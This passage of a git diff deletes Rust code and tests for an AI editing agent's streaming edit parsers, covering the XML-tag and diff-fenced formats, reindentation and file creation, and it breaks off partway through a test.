assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - } - - #[gpui::test] - async fn test_overwrite_no_content(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (chunks_tx, chunks_rx) = mpsc::unbounded::<&str>(); - let (apply, mut events) = agent.overwrite_with_chunks( - buffer.clone(), - chunks_rx.map(|chunk| Ok(chunk.to_string())), - &mut cx.to_async(), - ); - - drop(chunks_tx); - cx.run_until_parked(); - - let result = apply.await; - assert!(result.is_ok(),); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "" - ); - } - - #[gpui::test(iterations = 100)] - async fn test_indent_new_text_chunks(mut rng: StdRng) { - let chunks = to_random_chunks(&mut rng, " abc\n def\n ghi"); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let indented_chunks = - EditAgent::reindent_new_text_chunks(IndentDelta::Spaces(2), new_text_chunks) - .collect::>() - .await; - let new_text = indented_chunks - .into_iter() - .collect::>() - .unwrap(); - assert_eq!(new_text, " abc\n def\n ghi"); - } - - #[gpui::test(iterations = 100)] - async fn test_outdent_new_text_chunks(mut rng: StdRng) { - let chunks = to_random_chunks(&mut rng, "\t\t\t\tabc\n\t\tdef\n\t\t\t\t\t\tghi"); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let indented_chunks = - EditAgent::reindent_new_text_chunks(IndentDelta::Tabs(-2), new_text_chunks) - .collect::>() - .await; - let new_text = indented_chunks - .into_iter() - .collect::>() - .unwrap(); - assert_eq!(new_text, "\t\tabc\ndef\n\t\t\t\tghi"); - } - - #[gpui::test(iterations = 100)] - async fn test_random_indents(mut rng: StdRng) { - let len = rng.random_range(1..=100); - let new_text = util::RandomCharIter::new(&mut rng) - .with_simple_text() - .take(len) - .collect::(); - let new_text = new_text - .split('\n') - .map(|line| format!("{}{}", " ".repeat(rng.random_range(0..=8)), line)) - .collect::>() - .join("\n"); - let delta = IndentDelta::Spaces(rng.random_range(-4i8..=4i8) as isize); - - let chunks = to_random_chunks(&mut rng, &new_text); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let reindented_chunks = EditAgent::reindent_new_text_chunks(delta, new_text_chunks) - .collect::>() - .await; - let actual_reindented_text = reindented_chunks - .into_iter() - .collect::>() - .unwrap(); - let expected_reindented_text = new_text - .split('\n') - .map(|line| { - if let Some(ix) = line.find(|c| c != ' ') { - let new_indent = cmp::max(0, ix as isize + delta.len()) as usize; - format!("{}{}", " ".repeat(new_indent), &line[ix..]) - } else { - line.to_string() - } - }) - .collect::>() - .join("\n"); - assert_eq!(actual_reindented_text, expected_reindented_text); - } - - fn to_random_chunks(rng: &mut StdRng, input: &str) -> Vec { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let mut chunks = Vec::new(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - chunks.push(input[last_ix..chunk_ix].to_string()); - last_ix = chunk_ix; - } - chunks - } - - fn simulate_llm_output( - agent: &EditAgent, - output: &str, - rng: &mut StdRng, - cx: &mut TestAppContext, - ) { - let executor = cx.executor(); - let chunks = to_random_chunks(rng, output); - let model = agent.model.clone(); - cx.background_spawn(async move { - for chunk in chunks { - executor.simulate_random_delay().await; - model - .as_fake() - .send_last_completion_stream_text_chunk(chunk); - } - model.as_fake().end_last_completion_stream(); - }) - .detach(); - } - - async fn init_test(cx: &mut TestAppContext) -> EditAgent { - init_test_with_thinking(cx, true).await - } - - async fn init_test_with_thinking(cx: &mut TestAppContext, thinking_allowed: bool) -> EditAgent { - cx.update(settings::init); - - let project = Project::test(FakeFs::new(cx.executor()), [], cx).await; - let model = Arc::new(FakeLanguageModel::default()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - EditAgent::new( - model, - project, - action_log, - Templates::new(), - EditFormat::XmlTags, - thinking_allowed, - true, - ) - } - - #[gpui::test(iterations = 10)] - async fn test_non_unique_text_error(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let original_text = indoc! {" - function foo() { - return 42; - } - - function bar() { - return 42; - } - - function baz() { - return 42; - } - "}; - let buffer = cx.new(|cx| Buffer::local(original_text, cx)); - let (apply, mut events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - // When matches text in more than one place - simulate_llm_output( - &agent, - indoc! {" - - return 42; - } - - - return 100; - } - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - // Then the text should remain unchanged - let result_text = buffer.read_with(cx, |buffer, _| buffer.snapshot().text()); - assert_eq!( - result_text, - indoc! {" - function foo() { - return 42; - } - - function bar() { - return 42; - } - - function baz() { - return 42; - } - "}, - "Text should remain unchanged when there are multiple matches" - ); - - // And AmbiguousEditRange even should be emitted - let events = drain_events(&mut events); - let ambiguous_ranges = vec![2..3, 6..7, 10..11]; - assert!( - events.contains(&EditAgentOutputEvent::AmbiguousEditRange(ambiguous_ranges)), - "Should emit AmbiguousEditRange for non-unique text" - ); - } - - #[gpui::test] - async fn test_thinking_allowed_forwarded_to_request(cx: &mut TestAppContext) { - let agent = init_test_with_thinking(cx, false).await; - let buffer = cx.new(|cx| Buffer::local("hello\n", cx)); - let (_apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - let pending = agent.model.as_fake().pending_completions(); - assert_eq!(pending.len(), 1); - assert!( - !pending[0].thinking_allowed, - "Expected thinking_allowed to be false when EditAgent is constructed with allow_thinking=false" - ); - agent.model.as_fake().end_last_completion_stream(); - - let agent = init_test_with_thinking(cx, true).await; - let buffer = cx.new(|cx| Buffer::local("hello\n", cx)); - let (_apply, _events) = agent.edit( - buffer, - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - let pending = agent.model.as_fake().pending_completions(); - assert_eq!(pending.len(), 1); - assert!( - pending[0].thinking_allowed, - "Expected thinking_allowed to be true when EditAgent is constructed with allow_thinking=true" - ); - agent.model.as_fake().end_last_completion_stream(); - } - - fn drain_events( - stream: &mut UnboundedReceiver, - ) -> Vec { - let mut events = Vec::new(); - while let Ok(event) = stream.try_recv() { - events.push(event); - } - events - } -} diff --git a/crates/agent/src/edit_agent/create_file_parser.rs b/crates/agent/src/edit_agent/create_file_parser.rs deleted file mode 100644 index 2272434d796a92..00000000000000 --- a/crates/agent/src/edit_agent/create_file_parser.rs +++ /dev/null @@ -1,237 +0,0 @@ -use std::sync::OnceLock; - -use regex::Regex; -use smallvec::SmallVec; -use util::debug_panic; - -static START_MARKER: OnceLock = OnceLock::new(); -static END_MARKER: OnceLock = OnceLock::new(); - -#[derive(Debug)] -pub enum CreateFileParserEvent { - NewTextChunk { chunk: String }, -} - -#[derive(Debug)] -pub struct CreateFileParser { - state: ParserState, - buffer: String, -} - -#[derive(Debug, PartialEq)] -enum ParserState { - Pending, - WithinText, - Finishing, - Finished, -} - -impl CreateFileParser { - pub fn new() -> Self { - CreateFileParser { - state: ParserState::Pending, - buffer: String::new(), - } - } - - pub fn push(&mut self, chunk: Option<&str>) -> SmallVec<[CreateFileParserEvent; 1]> { - if chunk.is_none() { - self.state = ParserState::Finishing; - } - - let chunk = chunk.unwrap_or_default(); - - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - let start_marker_regex = START_MARKER.get_or_init(|| Regex::new(r"\n?```\S*\n").unwrap()); - let end_marker_regex = END_MARKER.get_or_init(|| Regex::new(r"(^|\n)```\s*$").unwrap()); - loop { - match &mut self.state { - ParserState::Pending => { - if let Some(m) = start_marker_regex.find(&self.buffer) { - self.buffer.drain(..m.end()); - self.state = ParserState::WithinText; - } else { - break; - } - } - ParserState::WithinText => { - let text = self.buffer.trim_end_matches(&['`', '\n', ' ']); - let text_len = text.len(); - - if text_len > 0 { - edit_events.push(CreateFileParserEvent::NewTextChunk { - chunk: self.buffer.drain(..text_len).collect(), - }); - } - break; - } - ParserState::Finishing => { - if let Some(m) = end_marker_regex.find(&self.buffer) { - self.buffer.drain(m.start()..); - } - if !self.buffer.is_empty() { - if !self.buffer.ends_with('\n') { - self.buffer.push('\n'); - } - edit_events.push(CreateFileParserEvent::NewTextChunk { - chunk: self.buffer.drain(..).collect(), - }); - } - self.state = ParserState::Finished; - break; - } - ParserState::Finished => debug_panic!("Can't call parser after finishing"), - } - } - edit_events - } -} - -#[cfg(test)] -mod tests { - use super::*; - use indoc::indoc; - use rand::prelude::*; - use std::cmp; - - #[gpui::test(iterations = 100)] - fn test_happy_path(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks("```\nHello world\n```", &mut parser, &mut rng), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_cut_prefix(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - Let me write this file for you: - - ``` - Hello world - ``` - - "}, - &mut parser, - &mut rng - ), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_language_name_on_fences(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - ```rust - Hello world - ``` - - "}, - &mut parser, - &mut rng - ), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_leave_suffix(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - Let me write this file for you: - - ``` - Hello world - ``` - - The end - "}, - &mut parser, - &mut rng - ), - // This output is malformed, so we're doing our best effort - "Hello world\n```\n\nThe end\n".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_inner_fences(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - Let me write this file for you: - - ``` - ``` - Hello world - ``` - ``` - "}, - &mut parser, - &mut rng - ), - // This output is malformed, so we're doing our best effort - "```\nHello world\n```\n".to_string() - ); - } - - #[gpui::test(iterations = 10)] - fn test_empty_file(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - ``` - ``` - "}, - &mut parser, - &mut rng - ), - "".to_string() - ); - } - - fn parse_random_chunks(input: &str, parser: &mut CreateFileParser, rng: &mut StdRng) -> String { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let chunk_indices = chunk_indices - .into_iter() - .map(Some) - .chain(vec![None]) - .collect::>>(); - - let mut edit = String::default(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - let mut chunk = None; - if let Some(chunk_ix) = chunk_ix { - chunk = Some(&input[last_ix..chunk_ix]); - last_ix = chunk_ix; - } - - for event in parser.push(chunk) { - match event { - CreateFileParserEvent::NewTextChunk { chunk } => { - edit.push_str(&chunk); - } - } - } - } - edit - } -} diff --git a/crates/agent/src/edit_agent/edit_parser.rs b/crates/agent/src/edit_agent/edit_parser.rs deleted file mode 100644 index c1aa61e18d4a45..00000000000000 --- a/crates/agent/src/edit_agent/edit_parser.rs +++ /dev/null @@ -1,1094 +0,0 @@ -use anyhow::bail; -use derive_more::{Add, AddAssign}; -use language_model::LanguageModel; -use regex::Regex; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; -use smallvec::SmallVec; -use std::{mem, ops::Range, str::FromStr, sync::Arc}; - -const OLD_TEXT_END_TAG: &str = ""; -const NEW_TEXT_END_TAG: &str = ""; -const EDITS_END_TAG: &str = ""; -const SEARCH_MARKER: &str = "<<<<<<< SEARCH"; -const SEPARATOR_MARKER: &str = "======="; -const REPLACE_MARKER: &str = ">>>>>>> REPLACE"; -const SONNET_PARAMETER_INVOKE_1: &str = "\n"; -const SONNET_PARAMETER_INVOKE_2: &str = ""; -const SONNET_PARAMETER_INVOKE_3: &str = ""; -const END_TAGS: [&str; 6] = [ - OLD_TEXT_END_TAG, - NEW_TEXT_END_TAG, - EDITS_END_TAG, - SONNET_PARAMETER_INVOKE_1, // Remove these after switching to streaming tool call - SONNET_PARAMETER_INVOKE_2, - SONNET_PARAMETER_INVOKE_3, -]; - -#[derive(Debug)] -pub enum EditParserEvent { - OldTextChunk { - chunk: String, - done: bool, - line_hint: Option, - }, - NewTextChunk { - chunk: String, - done: bool, - }, -} - -#[derive( - Clone, Debug, Default, PartialEq, Eq, Add, AddAssign, Serialize, Deserialize, JsonSchema, -)] -pub struct EditParserMetrics { - pub tags: usize, - pub mismatched_tags: usize, -} - -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum EditFormat { - /// XML-like tags: - /// ... - /// ... - XmlTags, - /// Diff-fenced format, in which: - /// - Text before the SEARCH marker is ignored - /// - Fences are optional - /// - Line hint is optional. - /// - /// Example: - /// - /// ```diff - /// <<<<<<< SEARCH line=42 - /// ... - /// ======= - /// ... - /// >>>>>>> REPLACE - /// ``` - DiffFenced, -} - -impl FromStr for EditFormat { - type Err = anyhow::Error; - - fn from_str(s: &str) -> anyhow::Result { - match s.to_lowercase().as_str() { - "xml_tags" | "xml" => Ok(EditFormat::XmlTags), - "diff_fenced" | "diff-fenced" | "diff" => Ok(EditFormat::DiffFenced), - _ => bail!("Unknown EditFormat: {}", s), - } - } -} - -impl EditFormat { - /// Return an optimal edit format for the language model - pub fn from_model(model: Arc) -> anyhow::Result { - if model.provider_id().0 == "google" || model.id().0.to_lowercase().contains("gemini") { - Ok(EditFormat::DiffFenced) - } else { - Ok(EditFormat::XmlTags) - } - } - - /// Return an optimal edit format for the language model, - /// with the ability to override it by setting the - /// `ZED_EDIT_FORMAT` environment variable - #[allow(dead_code)] - pub fn from_env(model: Arc) -> anyhow::Result { - let default = EditFormat::from_model(model)?; - std::env::var("ZED_EDIT_FORMAT").map_or(Ok(default), |s| EditFormat::from_str(&s)) - } -} - -pub trait EditFormatParser: Send + std::fmt::Debug { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]>; - fn take_metrics(&mut self) -> EditParserMetrics; -} - -#[derive(Debug)] -pub struct XmlEditParser { - state: XmlParserState, - buffer: String, - metrics: EditParserMetrics, -} - -#[derive(Debug, PartialEq)] -enum XmlParserState { - Pending, - WithinOldText { start: bool, line_hint: Option }, - AfterOldText, - WithinNewText { start: bool }, -} - -#[derive(Debug)] -pub struct DiffFencedEditParser { - state: DiffParserState, - buffer: String, - metrics: EditParserMetrics, -} - -#[derive(Debug, PartialEq)] -enum DiffParserState { - Pending, - WithinSearch { start: bool, line_hint: Option }, - WithinReplace { start: bool }, -} - -/// Main parser that delegates to format-specific parsers -pub struct EditParser { - parser: Box, -} - -impl XmlEditParser { - pub fn new() -> Self { - XmlEditParser { - state: XmlParserState::Pending, - buffer: String::new(), - metrics: EditParserMetrics::default(), - } - } - - fn find_end_tag(&self) -> Option> { - let (tag, start_ix) = END_TAGS - .iter() - .flat_map(|tag| Some((tag, self.buffer.find(tag)?))) - .min_by_key(|(_, ix)| *ix)?; - Some(start_ix..start_ix + tag.len()) - } - - fn ends_with_tag_prefix(&self) -> bool { - let mut end_prefixes = END_TAGS - .iter() - .flat_map(|tag| (1..tag.len()).map(move |i| &tag[..i])) - .chain(["\n"]); - end_prefixes.any(|prefix| self.buffer.ends_with(&prefix)) - } - - fn parse_line_hint(&self, tag: &str) -> Option { - use std::sync::LazyLock; - static LINE_HINT_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#"line=(?:"?)(\d+)"#).unwrap()); - - LINE_HINT_REGEX - .captures(tag) - .and_then(|caps| caps.get(1)) - .and_then(|m| m.as_str().parse::().ok()) - } -} - -impl EditFormatParser for XmlEditParser { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - loop { - match &mut self.state { - XmlParserState::Pending => { - if let Some(start) = self.buffer.find("') { - let tag_end = start + tag_end + 1; - let tag = &self.buffer[start..tag_end]; - let line_hint = self.parse_line_hint(tag); - self.buffer.drain(..tag_end); - self.state = XmlParserState::WithinOldText { - start: true, - line_hint, - }; - } else { - break; - } - } else { - break; - } - } - XmlParserState::WithinOldText { start, line_hint } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - let line_hint = *line_hint; - if let Some(tag_range) = self.find_end_tag() { - let mut chunk = self.buffer[..tag_range.start].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.metrics.tags += 1; - if &self.buffer[tag_range.clone()] != OLD_TEXT_END_TAG { - self.metrics.mismatched_tags += 1; - } - - self.buffer.drain(..tag_range.end); - self.state = XmlParserState::AfterOldText; - edit_events.push(EditParserEvent::OldTextChunk { - chunk, - done: true, - line_hint, - }); - } else { - if !self.ends_with_tag_prefix() { - edit_events.push(EditParserEvent::OldTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - line_hint, - }); - } - break; - } - } - XmlParserState::AfterOldText => { - if let Some(start) = self.buffer.find("") { - self.buffer.drain(..start + "".len()); - self.state = XmlParserState::WithinNewText { start: true }; - } else { - break; - } - } - XmlParserState::WithinNewText { start } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - if let Some(tag_range) = self.find_end_tag() { - let mut chunk = self.buffer[..tag_range.start].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.metrics.tags += 1; - if &self.buffer[tag_range.clone()] != NEW_TEXT_END_TAG { - self.metrics.mismatched_tags += 1; - } - - self.buffer.drain(..tag_range.end); - self.state = XmlParserState::Pending; - edit_events.push(EditParserEvent::NewTextChunk { chunk, done: true }); - } else { - if !self.ends_with_tag_prefix() { - edit_events.push(EditParserEvent::NewTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - }); - } - break; - } - } - } - } - edit_events - } - - fn take_metrics(&mut self) -> EditParserMetrics { - std::mem::take(&mut self.metrics) - } -} - -impl DiffFencedEditParser { - pub fn new() -> Self { - DiffFencedEditParser { - state: DiffParserState::Pending, - buffer: String::new(), - metrics: EditParserMetrics::default(), - } - } - - fn ends_with_diff_marker_prefix(&self) -> bool { - let diff_markers = [SEPARATOR_MARKER, REPLACE_MARKER]; - let mut diff_prefixes = diff_markers - .iter() - .flat_map(|marker| (1..marker.len()).map(move |i| &marker[..i])) - .chain(["\n"]); - diff_prefixes.any(|prefix| self.buffer.ends_with(&prefix)) - } - - fn parse_line_hint(&self, search_line: &str) -> Option { - use regex::Regex; - use std::sync::LazyLock; - static LINE_HINT_REGEX: LazyLock = - LazyLock::new(|| Regex::new(r#"line=(?:"?)(\d+)"#).unwrap()); - - LINE_HINT_REGEX - .captures(search_line) - .and_then(|caps| caps.get(1)) - .and_then(|m| m.as_str().parse::().ok()) - } -} - -impl EditFormatParser for DiffFencedEditParser { - fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - loop { - match &mut self.state { - DiffParserState::Pending => { - if let Some(diff) = self.buffer.find(SEARCH_MARKER) { - let search_end = diff + SEARCH_MARKER.len(); - if let Some(newline_pos) = self.buffer[search_end..].find('\n') { - let search_line = &self.buffer[diff..search_end + newline_pos]; - let line_hint = self.parse_line_hint(search_line); - self.buffer.drain(..search_end + newline_pos + 1); - self.state = DiffParserState::WithinSearch { - start: true, - line_hint, - }; - } else { - break; - } - } else { - break; - } - } - DiffParserState::WithinSearch { start, line_hint } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - let line_hint = *line_hint; - if let Some(separator_pos) = self.buffer.find(SEPARATOR_MARKER) { - let mut chunk = self.buffer[..separator_pos].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - let separator_end = separator_pos + SEPARATOR_MARKER.len(); - if let Some(newline_pos) = self.buffer[separator_end..].find('\n') { - self.buffer.drain(..separator_end + newline_pos + 1); - self.state = DiffParserState::WithinReplace { start: true }; - edit_events.push(EditParserEvent::OldTextChunk { - chunk, - done: true, - line_hint, - }); - } else { - break; - } - } else { - if !self.ends_with_diff_marker_prefix() { - edit_events.push(EditParserEvent::OldTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - line_hint, - }); - } - break; - } - } - DiffParserState::WithinReplace { start } => { - if !self.buffer.is_empty() { - if *start && self.buffer.starts_with('\n') { - self.buffer.remove(0); - } - *start = false; - } - - if let Some(replace_pos) = self.buffer.find(REPLACE_MARKER) { - let mut chunk = self.buffer[..replace_pos].to_string(); - if chunk.ends_with('\n') { - chunk.pop(); - } - - self.buffer.drain(..replace_pos + REPLACE_MARKER.len()); - if let Some(newline_pos) = self.buffer.find('\n') { - self.buffer.drain(..newline_pos + 1); - } else { - self.buffer.clear(); - } - - self.state = DiffParserState::Pending; - edit_events.push(EditParserEvent::NewTextChunk { chunk, done: true }); - } else { - if !self.ends_with_diff_marker_prefix() { - edit_events.push(EditParserEvent::NewTextChunk { - chunk: mem::take(&mut self.buffer), - done: false, - }); - } - break; - } - } - } - } - edit_events - } - - fn take_metrics(&mut self) -> EditParserMetrics { - std::mem::take(&mut self.metrics) - } -} - -impl EditParser { - pub fn new(format: EditFormat) -> Self { - let parser: Box = match format { - EditFormat::XmlTags => Box::new(XmlEditParser::new()), - EditFormat::DiffFenced => Box::new(DiffFencedEditParser::new()), - }; - EditParser { parser } - } - - pub fn push(&mut self, chunk: &str) -> SmallVec<[EditParserEvent; 1]> { - self.parser.push(chunk) - } - - pub fn finish(mut self) -> EditParserMetrics { - self.parser.take_metrics() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use indoc::indoc; - use rand::prelude::*; - use std::cmp; - - #[gpui::test(iterations = 1000)] - fn test_xml_single_edit(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "originalupdated", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "original".to_string(), - new_text: "updated".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_multiple_edits(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - - first old - first new - second old - second new - - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "first old".to_string(), - new_text: "first new".to_string(), - line_hint: None, - }, - Edit { - old_text: "second old".to_string(), - new_text: "second new".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_edits_with_extra_text(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - ignore this - contentextra stuffupdated contenttrailing data - more text second item - middle textmodified second itemend - third caseimproved third case with trailing text - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "content".to_string(), - new_text: "updated content".to_string(), - line_hint: None, - }, - Edit { - old_text: "second item".to_string(), - new_text: "modified second item".to_string(), - line_hint: None, - }, - Edit { - old_text: "third case".to_string(), - new_text: "improved third case".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 6, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_edits_with_closing_parameter_invoke(mut rng: StdRng) { - // This case is a regression with Claude Sonnet 4.5. - // Sometimes Sonnet thinks that it's doing a tool call - // and closes its response with '' - // instead of properly closing - - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - some textupdated text - more textupd - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "some text".to_string(), - new_text: "updated text".to_string(), - line_hint: None, - }, - Edit { - old_text: "more text".to_string(), - new_text: "upd".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 2 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_nested_tags(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "code with nested elementsnew content", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "code with nested elements".to_string(), - new_text: "new content".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_empty_old_and_new_text(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "".to_string(), - new_text: "".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_xml_multiline_content(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - "line1\nline2\nline3line1\nmodified line2\nline3", - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "line1\nline2\nline3".to_string(), - new_text: "line1\nmodified line2\nline3".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_xml_mismatched_tags(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - // Reduced from an actual Sonnet 3.7 output - indoc! {" - - a - b - c - - - a - B - c - - - d - e - f - - - D - e - F - - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "a\nb\nc".to_string(), - new_text: "a\nB\nc".to_string(), - line_hint: None, - }, - Edit { - old_text: "d\ne\nf".to_string(), - new_text: "D\ne\nF".to_string(), - line_hint: None, - } - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 4, - mismatched_tags: 4 - } - ); - - let mut parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - // Reduced from an actual Opus 4 output - indoc! {" - - - Lorem - - - LOREM - - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "Lorem".to_string(), - new_text: "LOREM".to_string(), - line_hint: None, - },] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 2, - mismatched_tags: 1 - } - ); - } - - #[gpui::test(iterations = 1000)] - fn test_diff_fenced_single_edit(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - original text - ======= - updated text - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "original text".to_string(), - new_text: "updated text".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_with_markdown_fences(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - ```diff - <<<<<<< SEARCH - from flask import Flask - ======= - import math - from flask import Flask - >>>>>>> REPLACE - ``` - "}, - &mut parser, - &mut rng - ), - vec![Edit { - old_text: "from flask import Flask".to_string(), - new_text: "import math\nfrom flask import Flask".to_string(), - line_hint: None, - }] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_diff_fenced_multiple_edits(mut rng: StdRng) { - let mut parser = EditParser::new(EditFormat::DiffFenced); - assert_eq!( - parse_random_chunks( - indoc! {" - <<<<<<< SEARCH - first old - ======= - first new - >>>>>>> REPLACE - - <<<<<<< SEARCH - second old - ======= - second new - >>>>>>> REPLACE - "}, - &mut parser, - &mut rng - ), - vec![ - Edit { - old_text: "first old".to_string(), - new_text: "first new".to_string(), - line_hint: None, - }, - Edit { - old_text: "second old".to_string(), - new_text: "second new".to_string(), - line_hint: None, - }, - ] - ); - assert_eq!( - parser.finish(), - EditParserMetrics { - tags: 0, - mismatched_tags: 0 - } - ); - } - - #[gpui::test(iterations = 100)] - fn test_mixed_formats(mut rng: StdRng) { - // Test XML format parser only parses XML tags - let mut xml_parser = EditParser::new(EditFormat::XmlTags); - assert_eq!( - parse_random_chunks( - indoc! {" - xml style oldxml style new - - <<<<<<< SEARCH - diff style old - ======= - diff style new - >>>>>>> REPLACE - "}, - &mut xml_parser, - &mut rng - ), - vec![Edit { - 